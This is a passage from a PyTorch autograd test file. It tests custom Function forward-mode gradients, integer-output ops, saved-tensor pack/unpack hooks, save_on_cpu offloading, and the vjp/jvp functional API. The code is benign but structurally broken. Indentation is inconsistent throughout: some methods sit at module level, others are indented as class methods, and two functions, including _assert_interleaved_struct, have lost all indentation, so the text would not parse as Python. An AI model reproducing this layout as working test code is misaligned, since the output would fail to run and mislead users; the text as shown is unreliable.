                gradcheck(test_fn, inp, check_forward_ad=True)
def test_custom_function_forward_mode_inplace_checks(self):
    """Forward-mode AD of an in-place custom Function: the jvp must modify
    the tangent in place too; returning a fresh tensor instead raises."""
    class InplaceFn(Function):
        @staticmethod
        def forward(ctx, foo, flag):
            ctx.mark_dirty(foo)
            ctx.flag = flag
            foo.mul_(2)
            return foo

        @staticmethod
        def vjp(ctx, gO):
            return 2 * gO, None

        @staticmethod
        def jvp(ctx, gI, _):
            if ctx.flag:
                # Don't do the change inplace
                return 2 * gI
            else:
                gI.mul_(2)
                return gI

    inp = torch.rand(4, 4, dtype=torch.double, requires_grad=True)

    def test_fn(inp, flag):
        # clone so the Function's in-place write never touches the gradcheck input
        inp = inp.clone()
        return InplaceFn.apply(inp, flag)

    gradcheck(test_fn, (inp, False), check_forward_ad=True)

    with self.assertRaisesRegex(RuntimeError, "inplace custom Function is not modifying the forward mode gradients inplace"):
        gradcheck(test_fn, (inp, True), check_forward_ad=True)
def test_custom_function_forward_mode_wrong_formula(self):
    """gradcheck with check_forward_ad detects a jvp whose formula
    disagrees with the vjp (3*gI instead of 2*gI)."""
    class UserFn(Function):
        @staticmethod
        def forward(ctx, foo, should_fail):
            ctx.should_fail = should_fail
            return foo * 2

        @staticmethod
        def vjp(ctx, gO):
            return 2 * gO, None

        @staticmethod
        def jvp(ctx, gI, _):
            if ctx.should_fail:
                # Wrong gradient formula
                return 3 * gI
            else:
                return 2 * gI

    inp = torch.rand(10, dtype=torch.double, requires_grad=True)
    gradcheck(UserFn.apply, (inp, False), check_forward_ad=True)

    with self.assertRaisesRegex(RuntimeError, "Jacobian computed with forward mode mismatch for output 0"):
        gradcheck(UserFn.apply, (inp, True), check_forward_ad=True)
def test_custom_function_local_inplace(self):
    """In-place modification of a purely local view inside a custom
    Function's forward does not change the output's grad_fn class."""
    class MyFn(torch.autograd.Function):
        @staticmethod
        def forward(ctx, inp, inplace):
            # view of a local clone — never aliases the caller's tensor
            view = inp.clone()[:3]
            if inplace:
                view += 2
            return view

        @staticmethod
        def backward(ctx, grad):
            return grad, None

    base = torch.rand(10, requires_grad=True)

    foo = MyFn.apply(base, False)
    self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")

    foo = MyFn.apply(base, True)
    self.assertEqual(foo.grad_fn.__class__.__name__, "MyFnBackward")
def test_integer_outputs(self):
    """Ops with integer outputs never set requires_grad on those outputs:
    argmax/argmin/argsort, searchsorted, bucketize, count_nonzero, and the
    whole public/internal `unique` family (only the first, value, output of
    unique may require grad)."""
    inp = torch.rand(4, requires_grad=True)

    out = inp.argmax()
    self.assertFalse(out.dtype.is_floating_point)
    self.assertFalse(out.requires_grad)

    out = inp.argmin()
    self.assertFalse(out.dtype.is_floating_point)
    self.assertFalse(out.requires_grad)

    out = inp.argsort()
    self.assertFalse(out.dtype.is_floating_point)
    self.assertFalse(out.requires_grad)

    val = torch.rand((), requires_grad=True)

    out = torch.searchsorted(inp, val)
    self.assertFalse(out.dtype.is_floating_point)
    self.assertFalse(out.requires_grad)

    bins = torch.linspace(0, 1.0, steps=100, requires_grad=True)
    vals = torch.rand(5, 5, requires_grad=True)
    out = torch.bucketize(vals, bins)
    self.assertFalse(out.dtype.is_floating_point)
    self.assertFalse(out.requires_grad)

    val = torch.empty(5).requires_grad_()
    out = val.count_nonzero()
    self.assertFalse(out.requires_grad)

    def assert_only_first_requires_grad(res):
        if not isinstance(res, tuple):
            res = (res,)
        self.assertTrue(res[0].requires_grad)
        for out in res[1:]:
            if out is not None:
                self.assertFalse(out.requires_grad)

    for sort in [True, False]:
        for return_inverse in [True, False]:
            for return_counts in [True, False]:
                res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
                                   return_counts=return_counts)
                assert_only_first_requires_grad(res)

                res = torch.unique(inp, sorted=sort, return_inverse=return_inverse,
                                   return_counts=return_counts, dim=0)
                assert_only_first_requires_grad(res)

                res = torch.unique_consecutive(inp, return_inverse=return_inverse,
                                               return_counts=return_counts)
                assert_only_first_requires_grad(res)

                res = torch.unique_consecutive(inp, return_inverse=return_inverse,
                                               return_counts=return_counts, dim=0)
                assert_only_first_requires_grad(res)

                # Here we test the internal functions to make sure all of them are
                # covered on top of the public API
                res = torch._unique(inp, sorted=sort, return_inverse=return_inverse)
                assert_only_first_requires_grad(res)

                # This looks public but is actually manually deleted from the
                # torch namespace in torch/functional.py
                res = torch._VF.unique_dim(inp, dim=0, sorted=sort, return_inverse=return_inverse,
                                           return_counts=return_counts)
                assert_only_first_requires_grad(res)

                # We don't test `unique_dim_consecutive` here.
                # It looks public but the python binding is actually manually disabled in
                # tools/autograd/gen_python_functions.py
                res = torch._unique2(inp, sorted=sort, return_inverse=return_inverse,
                                     return_counts=return_counts)
                assert_only_first_requires_grad(res)
def test_custom_function_cycle(self):
    """A reference cycle through ctx (output stored in a dict that ctx
    keeps) does not leak: with gc disabled the output stays alive, and
    gc.collect() breaks the cycle — both with and without a backward call."""
    class MyFn(Function):
        @staticmethod
        def forward(ctx, x, metadata):
            x = x.clone()
            ctx.meta = metadata
            ctx.save_for_backward(x)
            return x

        @staticmethod
        def backward(ctx, gO):
            x, = ctx.saved_tensors
            self.assertEqual(x, 3.14)
            self.assertEqual(ctx.meta["foo"], 3.14)
            return gO * x, None

    def get_refs(with_backward):
        a = torch.tensor(3.14, requires_grad=True)

        metadata = {}
        out = MyFn.apply(a, metadata)

        # cycle: out -> grad_fn -> ctx.meta -> out
        metadata["foo"] = out

        if with_backward:
            out.sum().backward()
            self.assertEqual(a.grad, a)

        return torch._C._WeakTensorRef(out)

    with disable_gc():
        ref = get_refs(False)
        self.assertFalse(ref.expired())
    gc.collect()
    self.assertTrue(ref.expired())

    # The backward clears the saved_variables but not the __dict__
    with disable_gc():
        ref = get_refs(True)
        self.assertFalse(ref.expired())
    gc.collect()
    self.assertTrue(ref.expired())
def test_input_buffer_accum(self):
    """Accumulating a sparse and a dense gradient into the same leaf must
    leave the caller-provided dense gradient unmodified."""
    leaf = torch.rand(2, 2, requires_grad=True)

    # An op that returns sparse gradients
    gather_index = torch.tensor([[0, 0]], dtype=torch.long)
    sparse_grad_out = leaf.gather(0, gather_index, sparse_grad=True)

    # An op that returns the gradients as-is
    dense_grad_out = leaf.clone()

    grad_dense_original = torch.rand_like(dense_grad_out)
    grad_dense = grad_dense_original.clone()
    grad_sparse = torch.rand_like(sparse_grad_out)

    torch.autograd.backward(
        (dense_grad_out, sparse_grad_out), (grad_dense, grad_sparse)
    )

    # Given gradients should not be modified inplace
    self.assertEqual(grad_dense, grad_dense_original)
def test_no_unnecessary_unwrapping(self):
    """SavedVariable unwrapping: saved leaf inputs are returned as the very
    same object (identity), saved non-output intermediates too, while a
    saved *output* is equal but not identical; freed saved tensors raise."""
    a = torch.randn(5, requires_grad=True)
    a_orig = a.detach().clone()
    b = a * a
    c = a * b
    d = torch.exp(a)

    # a is leaf
    self.assertIs(b.grad_fn._saved_self, a)
    self.assertIs(b.grad_fn._saved_other, a)
    self.assertIs(c.grad_fn._saved_self, a)

    # b is not an output
    self.assertIs(c.grad_fn._saved_other, b)

    # d is an output
    self.assertEqual(d.grad_fn._saved_result, d)
    self.assertIsNot(d.grad_fn._saved_result, d)

    c.sum().backward()

    with self.assertRaisesRegex(RuntimeError, "after they have already been freed"):
        c.grad_fn._saved_self

    # a is left untouched
    self.assertEqual(a, a_orig)
def test_saved_variable_version_counter(self):
    """An unpacked saved output shares the original's version counter: an
    in-place update of the output is reflected in the unpacked tensor."""
    a = torch.rand(2, requires_grad=True)

    b = torch.exp(a)

    b_unpacked = b.grad_fn._saved_result
    self.assertEqual(b, b_unpacked)
    self.assertEqual(b._version, b_unpacked._version)

    with torch.no_grad():
        b += 1

    self.assertEqual(b, b_unpacked)
    self.assertEqual(b._version, b_unpacked._version)
def test_saved_variable_packing_unpacking_saved_original_with_hooks(self):
    """Per-SavedVariable pack/unpack hooks on a saved *original* tensor.

    Checks inverse and non-inverse hook pairs (and the resulting gradients),
    double backward, a non-Tensor-returning unpack hook, hooks with wrong
    arity, and an in-place-modifying pack hook — for both a leaf input and a
    non-leaf, non-output input.
    """
    # Tests that packing/unpacking a SavedVariable works correctly with user-defined hooks
    # The saved_original / did_not_save_original distinction corresponds to the `save_original`
    # attribute of `SavedVariable`.

    def test(get_input, is_leaf):
        # inverse hook pair: unpacked value equals the original
        a = get_input()
        grad_fn = a.grad_fn
        y = a * a
        y.grad_fn._raw_saved_self.register_hooks(lambda x: 2 * x, lambda x: x / 2)
        self.assertEqual(a, y.grad_fn._saved_self)
        if not is_leaf:
            self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
            y.sum().backward()
        else:
            y.sum().backward()
            self.assertEqual(2 * a, a.grad)

        # non-inverse pair: unpacked value (and grad) are scaled
        a = get_input()
        grad_fn = a.grad_fn
        y = a * a
        y.grad_fn._raw_saved_self.register_hooks(lambda x: 2 * x, lambda x: x)
        self.assertEqual(2 * a, y.grad_fn._saved_self)
        if not is_leaf:
            self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
            y.sum().backward()
        else:
            y.sum().backward()
            self.assertEqual(3 * a, a.grad)

        # double backward
        a = get_input()
        grad_fn = a.grad_fn
        y = a ** 3
        y.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: x)
        s = torch.sum(y)
        g, = torch.autograd.grad(s, (a, ), create_graph=True)
        if not is_leaf:
            self.assertIs(grad_fn, y.grad_fn._saved_self.grad_fn)
            g.sum().backward()
        else:
            g.sum().backward()
            self.assertEqual(6 * a, a.grad)

        # unpack hook must return a Tensor
        a = get_input()
        y = a * a
        y.grad_fn._raw_saved_self.register_hooks(lambda x: x, lambda x: 1)
        with self.assertRaisesRegex(TypeError, "Output of saved tensor unpack_hook expected to be a Tensor"):
            print(y.grad_fn._saved_self)

        # hooks must be unary callables
        a = get_input()
        y = a * a
        with self.assertRaisesRegex(TypeError, "missing 1 required positional argument"):
            y.grad_fn._raw_saved_self.register_hooks(lambda x, b: x, lambda x: x)

        a = get_input()
        y = a * a
        with self.assertRaisesRegex(TypeError, "missing 1 required positional argument"):
            y.grad_fn._raw_saved_self.register_hooks(lambda x, b: (x, b), lambda x: x)

        def inplace_double(x):
            x *= 2
            return x

        # pack hook must not modify its input in place
        a = get_input()
        t = a * a
        with self.assertRaisesRegex(RuntimeError, "A saved tensor pack hook is modifying its input in place."):
            t.grad_fn._raw_saved_self.register_hooks(inplace_double, lambda x: x / 2)

    # leaf
    test(lambda: torch.randn(5, requires_grad=True), True)
    # not leaf, not output
    test(lambda: (1 + torch.randn(5, requires_grad=True)), False)
def test_saved_variable_packing_unpacking_did_not_save_original_with_hooks(self):
    """Identity pack/unpack hooks on a saved *output* (exp saves its result,
    not its input): unpacked value and its grad_fn match, and backward
    produces grad == y for y = exp(a)."""
    # Tests that packing/unpacking a SavedVariable works correctly with user-defined hooks
    # The saved_original / did_not_save_original distinction corresponds to the `save_original`
    # attribute of `SavedVariable`.

    a = torch.randn(5, requires_grad=True)
    y = torch.exp(a)
    y.grad_fn._raw_saved_result.register_hooks(lambda x: x, lambda x: x)
    self.assertEqual(y, y.grad_fn._saved_result)
    self.assertIs(y.grad_fn, y.grad_fn._saved_result.grad_fn)
    y.sum().backward()
    self.assertEqual(a.grad, y)
def test_saved_variable_packing_unpacking_saved_original_with_default_hooks(self):
    """Default (context-manager) saved-tensors hooks on saved originals:
    the pack hook fires once per saved tensor, inverse/non-inverse pairs
    give the expected unpacked values and gradients, and hooks stop
    applying once the context exits."""
    # Tests that default hooks are properly registered, used and reset
    # The saved_original / did_not_save_original distinction corresponds to the `save_original`
    # attribute of `SavedVariable`.
    # See also:
    # - test_saved_variable_packing_unpacking_saved_original_with_hooks

    def pack(x):
        warnings.warn("pack")
        return x

    with torch.autograd.graph.saved_tensors_hooks(pack, lambda x: x):
        a = torch.ones(5, requires_grad=True)

        warnings.simplefilter('always')
        with warnings.catch_warnings(record=True) as w:
            y = a * a
            # should raise two warnings from a being saved twice
            self.assertEqual(len(w), 2)

    with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
        a = torch.randn(5, requires_grad=True)
        y = a * a
        self.assertEqual(a, y.grad_fn._saved_self)
        self.assertEqual(a, y.grad_fn._saved_other)
        y.sum().backward()
        self.assertEqual(2 * a, a.grad)

    with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x / 2):
        a = torch.randn(5, requires_grad=True)
        y = a * a
        self.assertEqual(a, y.grad_fn._saved_self)
        self.assertEqual(a, y.grad_fn._saved_other)
        y.sum().backward()
        self.assertEqual(2 * a, a.grad)

    with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
        a = torch.randn(5, requires_grad=True)
        y = a * a
        self.assertEqual(2 * a, y.grad_fn._saved_self)
        self.assertEqual(2 * a, y.grad_fn._saved_other)
        y.sum().backward()
        self.assertEqual(4 * a, a.grad)

    # Exited hooks correctly
    a = torch.randn(5, requires_grad=True)
    y = a * a
    self.assertEqual(a, y.grad_fn._saved_self)
    self.assertEqual(a, y.grad_fn._saved_other)
    y.sum().backward()
    self.assertEqual(2 * a, a.grad)
def test_saved_variable_packing_unpacking_did_not_save_original_with_default_hooks(self):
    """Identity default hooks on a saved *output* (exp): unpacked value
    matches and backward yields grad == y."""
    # See also test_saved_variable_packing_unpacking_did_not_save_original_with_hooks

    with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
        a = torch.randn(5, requires_grad=True)
        y = torch.exp(a)
        self.assertEqual(y, y.grad_fn._saved_result)
        y.sum().backward()
        self.assertEqual(a.grad, y)
def test_setting_default_saved_variable_hooks_twice_should_fail(self):
    """Nesting two default saved-tensors-hooks contexts raises."""
    identity = lambda x: x
    with self.assertRaisesRegex(RuntimeError, "Setting default hooks but they have already been set. "):
        with torch.autograd.graph.saved_tensors_hooks(identity, identity):
            with torch.autograd.graph.saved_tensors_hooks(identity, identity):
                pass
def test_pack_hook_with_inplace_modification_should_fail(self):
    """A pack hook that modifies its input in place raises — both as a
    default hook at save time and when registered on a raw SavedVariable."""
    a = torch.randn(5, requires_grad=True)

    def inc(x):
        x += 1
        return x

    with torch.autograd.graph.saved_tensors_hooks(inc, lambda x: x):
        with self.assertRaisesRegex(RuntimeError, "A saved tensor pack hook is modifying its input in place."):
            y = torch.exp(a)

    y = torch.exp(a)
    with self.assertRaisesRegex(RuntimeError, "A saved tensor pack hook is modifying its input in place."):
        y.grad_fn._raw_saved_result.register_hooks(inc, lambda x: x)
def test_saving_variable_to_disk(self):
    """Default hooks can round-trip saved tensors through disk: pack
    torch.save()s to a temp file and returns the path; unpack loads it
    back. Backward still produces the right gradient."""
    with tempfile.TemporaryDirectory() as tmp_dir:
        def pack(x):
            name = os.path.join(tmp_dir, str(uuid.uuid4()))
            torch.save(x, name)
            return name

        def unpack(name):
            return torch.load(name)

        with torch.autograd.graph.saved_tensors_hooks(pack, unpack):
            a = torch.ones(5, requires_grad=True)
            y = a * a
            self.assertEqual(a, y.grad_fn._saved_self)

            y.sum().backward()
            self.assertEqual(2 * a, a.grad)
def test_default_saved_variable_hooks_double_backward(self):
    """Default hooks interact multiplicatively with double backward: a
    2x pack hook scales the final grad by 2, 4, or 8 depending on whether
    the hook was active for the forward, the first-order grad, or both."""
    with torch.autograd.graph.saved_tensors_hooks(lambda x: x, lambda x: x):
        a = torch.randn(5, requires_grad=True)
        y = a ** 3
        s = torch.sum(y)
        g, = torch.autograd.grad(s, (a, ), create_graph=True)
        g.sum().backward()
        self.assertEqual(6 * a, a.grad)

    with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
        a = torch.randn(5, requires_grad=True)
        y = a ** 3
        s = torch.sum(y)
        g, = torch.autograd.grad(s, (a, ), create_graph=True)
        g.sum().backward()
        # factor 2 because only a is saved once
        self.assertEqual(6 * 2 * a, a.grad)

    a = torch.randn(5, requires_grad=True)
    y = a ** 3
    s = torch.sum(y)
    with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
        g, = torch.autograd.grad(s, (a, ), create_graph=True)
        g.sum().backward()
        # factor 4 because pow_backward is grad * (exp * self.pow(exp - 1))
        # so grad is saved and self (i.e. a) is saved
        self.assertEqual(6 * 4 * a, a.grad)

    with torch.autograd.graph.saved_tensors_hooks(lambda x: 2 * x, lambda x: x):
        a = torch.randn(5, requires_grad=True)
        y = a ** 3
        s = torch.sum(y)
        g, = torch.autograd.grad(s, (a, ), create_graph=True)
        g.sum().backward()
        # combining the two above blocks: 2 * 4 = 8
        # note that in that sense, a is saved twice
        self.assertEqual(6 * 8 * a, a.grad)
    def test_graph_save_on_cpu(self):
        """save_on_cpu must keep saved tensors usable: values, dtype and
        layout preserved and gradients unchanged, across dense/sparse
        inputs and pin_memory settings."""
        def test(get_input, cuda, pin_memory):
            with torch.autograd.graph.save_on_cpu(pin_memory):
                a = get_input()
                if cuda:
                    # NOTE(review): `a.cuda()` returns a new tensor and the
                    # result is discarded, so `a` stays on CPU and the
                    # cuda=True path does not actually exercise GPU tensors.
                    # Looks like `a = a.cuda()` was intended -- confirm.
                    a.cuda()
                y = a * a
                # Saved tensors are transparently restored with identical
                # values, dtype and layout.
                self.assertEqual(a, y.grad_fn._saved_self)
                self.assertEqual(a, y.grad_fn._saved_other)
                self.assertEqual(a.dtype, y.grad_fn._saved_self.dtype)
                self.assertEqual(a.layout, y.grad_fn._saved_self.layout)
                if y.is_sparse:
                    y = y.to_dense()
                y.sum().backward()
                self.assertEqual(2 * a, a.grad)
        for cuda in [False] + ([True] if torch.cuda.is_available() else []):
            for pin_memory in [True, False]:
                # FloatTensor
                test(lambda: torch.randn(5, requires_grad=True), cuda, pin_memory)
                # DoubleTensor
                test(lambda: torch.randn(5, requires_grad=True, dtype=torch.double), cuda, pin_memory)
                # Sparse tensor
                x = torch.sparse_coo_tensor(torch.tensor([[1, 1]]).long(), torch.tensor([1., 1.]), requires_grad=True)
                test(lambda: x, cuda, pin_memory)
    @unittest.skipIf(not TEST_CUDA, "test requires CUDA")
    def test_graph_save_on_cpu_cuda(self):
        """save_on_cpu should shrink CUDA memory held by the autograd graph
        down to the no-grad footprint, since saved tensors are offloaded
        to host memory."""
        def f(x):
            a = x + 1
            return a * a
        # with grad
        a = torch.ones(1, requires_grad=True, device="cuda")
        y = f(a)
        memory_with_grad = torch.cuda.memory_allocated()
        del a
        del y
        # without grad
        a = torch.ones(1, requires_grad=True, device="cuda")
        with torch.no_grad():
            y = f(a)
        memory_without_grad = torch.cuda.memory_allocated()
        # Autograd keeps `a + 1` alive for backward, so this must be larger.
        self.assertGreater(memory_with_grad, memory_without_grad)
        del a
        del y
        # with hooks
        with torch.autograd.graph.save_on_cpu():
            a = torch.ones(1, requires_grad=True, device="cuda")
            y = f(a)
            memory_with_hooks = torch.cuda.memory_allocated()
            # Offloading saved tensors to CPU frees their CUDA copies.
            self.assertEqual(memory_with_hooks, memory_without_grad)
def index_perm_variable(shape, max_indices):
    """Return a LongTensor of the given shape filled with distinct indices
    drawn from ``range(max_indices)``.

    ``shape`` may be an int or a tuple; prod(shape) must not exceed
    ``max_indices`` so that all entries can be unique.
    """
    if not isinstance(shape, tuple):
        shape = (shape,)
    total = reduce(mul, shape)
    # Prefix of a random permutation guarantees uniqueness of the entries.
    return torch.randperm(max_indices).narrow(0, 0, total).view(shape)
def bernoulli_scalar():
    """Return a 0-dim uint8 tensor holding a fair Bernoulli draw (0 or 1)."""
    result = torch.zeros((), dtype=torch.uint8)
    return result.bernoulli_()
class TestAutogradFunctional(TestCase):
    def _assert_same_struct(self, res, base):
        """Assert ``res`` mirrors ``base``: same Tensor/tuple structure with
        element-wise matching sizes."""
        # base and res should be Tensors or tuple of Tensors with the same size
        if isinstance(base, torch.Tensor):
            self.assertTrue(isinstance(res, torch.Tensor))
            self.assertEqual(base.size(), res.size())
        elif isinstance(base, tuple):
            self.assertTrue(isinstance(res, tuple))
            self.assertEqual(len(base), len(res))
            # Pairwise: every element must be a Tensor of matching size.
            for el_base, el_res in zip(base, res):
                self.assertTrue(isinstance(el_base, torch.Tensor))
                self.assertTrue(isinstance(el_res, torch.Tensor))
                self.assertEqual(el_base.size(), el_res.size())
        else:
            # Wrong base
            raise RuntimeError("The base given to `_assert_same_struct` doesn't have"
                               " the right structure.")
def _assert_interleaved_struct(self, res, base1, base2):
# base1 and base2 can be Tensors or tuples of Tensors.
# If they are tuples, res should be a tuple as well.
# The indexing works as follows for base1, base2 being
# - tuple, tuple: res[i][j][k][l] = (base1[i][k], base2[j][l])
# - tuple, Tensor: res[i][k][l] = (base1[i][k], base2[l])
# - Tensor, tuple: res[i][j][l] = (base1[i], base2[j][l])
# - Tensor, Tensor: res[k][l] = (base1[k], base2[l])
if isinstance(base1, torch.Tensor) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, torch.Tensor))
self.assertEqual(res.size(), base1.size() + base2.size())
elif isinstance(base1, tuple) and isinstance(base2, torch.Tensor):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base1, torch.Tensor))
self.assertEqual(el_res.size(), el_base1.size() + base2.size())
elif isinstance(base1, torch.Tensor) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base2))
for el_res, el_base2 in zip(res, base2):
self.assertTrue(isinstance(el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_res.size(), base1.size() + el_base2.size())
elif isinstance(base1, tuple) and isinstance(base2, tuple):
self.assertTrue(isinstance(res, tuple))
self.assertEqual(len(res), len(base1))
for el_res, el_base1 in zip(res, base1):
self.assertTrue(isinstance(el_res, tuple))
self.assertEqual(len(res), len(base2))
for el_el_res, el_base2 in zip(el_res, base2):
self.assertTrue(isinstance(el_el_res, torch.Tensor))
self.assertTrue(isinstance(el_base2, torch.Tensor))
self.assertEqual(el_el_res.size(), el_base1.size() + el_base2.size())
else:
# Wrong bases
raise RuntimeError("The bases given to `_assert_interleaved_struct` don't have"
" the right structure.")
    def test_vjp_err_check(self):
        """Exercise vjp's input-validation errors, then a valid call."""
        def foo(a):
            return 3 * a.narrow(0, 0, 3)
        def bar(a):
            # Second output is not a Tensor, which vjp must reject.
            return 3 * a.narrow(0, 0, 3), "bar"
        inp = torch.rand(4)
        v = torch.ones(3)
        with self.assertRaisesRegex(TypeError, "The inputs given to vjp must be either a Tensor"):
            res = autogradF.vjp(foo, (inp, 2), v)
        with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to vjp must"):
            res = autogradF.vjp(bar, inp, v)
        with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the user-provided function returns"):
            res = autogradF.vjp(foo, inp)
        with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
            res = autogradF.vjp(foo, inp, (torch.ones_like(inp), torch.ones_like(inp)))
        with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
            res = autogradF.vjp(foo, inp, v[:2])
        # Well-formed call: the gradient matches the input's structure.
        res = autogradF.vjp(foo, inp, v)[1]
        self._assert_same_struct(res, inp)
    def test_vjp_err_check_strict(self):
        """strict=True turns silent zero-gradients into errors; strict=False
        returns zeros (or v itself for an identity jacobian) instead."""
        def foo(a):
            return a.detach()
        def bar(a):
            # Make a non-leaf Tensor that requires_grad but that is not connected to the input
            return a.long().float().requires_grad_().clone()
        inp = torch.rand(4)
        v = torch.rand(4)
        with self.assertRaisesRegex(RuntimeError, "Output 0 of the user-provided function does not require gradients."):
            res = autogradF.vjp(foo, inp, v, strict=True)
        res = autogradF.vjp(foo, inp, v, strict=False)
        self._assert_same_struct(res[1], inp)
        self.assertEqual(res[1].abs().sum(), 0.)
        with self.assertRaisesRegex(RuntimeError, "The output of the user-provided function is independent of input 0"):
            res = autogradF.vjp(bar, inp, v, strict=True)
        res = autogradF.vjp(bar, inp, v, strict=False)
        self._assert_same_struct(res[1], inp)
        self.assertEqual(res[1].abs().sum(), 0.)
        # The Jacobian does not depend on the input
        def foo(a):
            return a.clone()
        inp.requires_grad_()
        with self.assertRaisesRegex(RuntimeError, "jacobian of the user-provided function is independent of input 0."):
            res = autogradF.vjp(foo, inp, v, create_graph=True, strict=True)
        res = autogradF.vjp(foo, inp, v, create_graph=True, strict=False)
        self._assert_same_struct(res[1], inp)
        # Identity function: the vjp is just v.
        self.assertEqual(res[1], v)
    def test_vjp_no_grad(self):
        """Under torch.no_grad() vjp still computes values but records no
        graph; create_graph=True overrides no_grad and records one."""
        def reducer(x):
            return x.sum(dim=1)
        inputs = torch.rand(4, 4)
        v = torch.ones(4)
        with torch.no_grad():
            res = autogradF.vjp(reducer, inputs, v)
        self.assertIsNone(res[0].grad_fn)
        self.assertIsNone(res[1].grad_fn)
        self.assertNotEqual(res[1], torch.zeros(4, 4))
        inputs.requires_grad_()
        v.requires_grad_()
        with torch.no_grad():
            res = autogradF.vjp(reducer, inputs, v, create_graph=True)
        self.assertIsNotNone(res[0].grad_fn)
        self.assertIsNotNone(res[1].grad_fn)
        self.assertNotEqual(res[1], torch.zeros(4, 4))
    def test_vjp_output(self):
        """vjp returns (outputs, grads) detached from any graph by default,
        for single-input, multi-input, and multi-output functions."""
        def reducer(x):
            return x.sum(dim=1)
        inputs = torch.rand(4, 4)
        v = torch.ones(4)
        res = autogradF.vjp(reducer, inputs, v)
        self._assert_same_struct(res[1], inputs)
        self.assertIsNone(res[0].grad_fn)
        self.assertIsNone(res[1].grad_fn)
        # Multiple inputs, single output.
        def adder(x, y):
            return 2 * x + 3 * y
        inputs = (torch.rand(2), torch.rand(2))
        v = torch.ones(2)
        out, vjp_val = autogradF.vjp(adder, inputs, v)
        self._assert_same_struct(vjp_val, inputs)
        self.assertIsNone(out.grad_fn)
        self.assertIsNone(vjp_val[0].grad_fn)
        self.assertIsNone(vjp_val[1].grad_fn)
        # Multiple inputs, multiple outputs (v is a matching tuple).
        def adder(x, y):
            return 2 * x + 3 * y, x + y
        inputs = (torch.rand(2), torch.rand(2))
        v = (torch.tensor([1., 0.]), torch.tensor([1., 0.]))
        out, vjp_val = autogradF.vjp(adder, inputs, v)
        self._assert_same_struct(vjp_val, inputs)
        self.assertIsNone(out[0].grad_fn)
        self.assertIsNone(out[1].grad_fn)
        self.assertIsNone(vjp_val[0].grad_fn)
        self.assertIsNone(vjp_val[1].grad_fn)
    def test_vjp_scalar(self):
        """vjp handles scalar outputs (v optional) and scalar inputs."""
        def reducer(x):
            return x.sum()
        inputs = torch.rand(4, 4)
        v = torch.ones([])
        res = autogradF.vjp(reducer, inputs, v)
        self._assert_same_struct(res[0], v)
        self._assert_same_struct(res[1], inputs)
        # v may be omitted when the output is a scalar.
        res = autogradF.vjp(reducer, inputs)
        self._assert_same_struct(res[0], v)
        self._assert_same_struct(res[1], inputs)
        def expander(x):
            return x.unsqueeze(0).repeat(4)
        inputs = torch.rand([])
        v = torch.ones(4)
        res = autogradF.vjp(expander, inputs, v)
        self._assert_same_struct(res[0], v)
        self._assert_same_struct(res[1], inputs)
def test_vjp_create_graph(self):
def reducer(x):
return x.sum(dim=1)
inputs = torch.rand(2, 2, dtype=torch.double)
v = torch.ones(2, dtype=torch.double)
inputs.requires_grad_()
v.requires_grad_()
res = autogradF.vjp(reducer, inputs, v, create_graph=True)
self._assert_same_struct(res[1], inputs)
self.assertIsNotNone(res[0].grad_fn)
self.assertIsNotNone(res[1].grad_fn)
gradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v))
gradgradcheck(lambda inp, v: autogradF.vjp(reducer, inputs, v, create_graph=True), (inputs, v))
def adder(x, y):
return 2 * x + 3 * y, x * y
inputs = (torch.rand(2, dtype=torch.double, requires_grad=True),
torch.rand(2, dtype=torch.double, requires_grad=True))
v = (torch.tensor([1., 0.], dtype=torch.double, requires_grad=True),
torch.tensor([1., 0.], dtype=torch.double, requires_grad=True))
gradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
gradgradcheck(lambda *args: autogradF.vjp(adder, args[:2], args[2:], create_graph=True)[1], inputs + v)
def foo(*args):
x, y = args[:2]
v = args[2:]
x = x.cos()
val, grad = autogradF.vjp(adder, (x, y), v, create_graph=True)
return val[0].exp() + val[1].exp() + grad[0].exp() + grad[1].exp() + x.exp() + y.exp()
gradcheck(foo, inputs + v)
gradgradcheck(foo, inputs + v)
    def test_jvp_err_check(self):
        """Exercise jvp's input-validation errors, then a valid call."""
        def foo(a):
            return 3 * a.narrow(0, 0, 3)
        def bar(a):
            # Second output is not a Tensor, which jvp must reject.
            return 3 * a.narrow(0, 0, 3), "bar"
        inp = torch.rand(4)
        v = torch.rand(4)
        with self.assertRaisesRegex(TypeError, "The inputs given to jvp must be either a Tensor"):
            res = autogradF.jvp(foo, (inp, 2), v)
        with self.assertRaisesRegex(TypeError, "The outputs of the user-provided function given to jvp must"):
            res = autogradF.jvp(bar, inp, v)
        with self.assertRaisesRegex(RuntimeError, "The vector v can only be None if the input to the user-provided function"):
            res = autogradF.jvp(foo, inp)
        with self.assertRaisesRegex(RuntimeError, "The given v should contain a single Tensor."):
            res = autogradF.jvp(foo, inp, (v, v))
        with self.assertRaisesRegex(RuntimeError, "v has invalid size: should be torch.Size"):
            res = autogradF.jvp(foo, inp, v[:2])
        # Well-formed call: the jvp matches the output's structure.
        res = autogradF.jvp(foo, inp, v)[1]
        self._assert_same_struct(res, foo(inp))
    def test_jvp_err_check_strict(self):
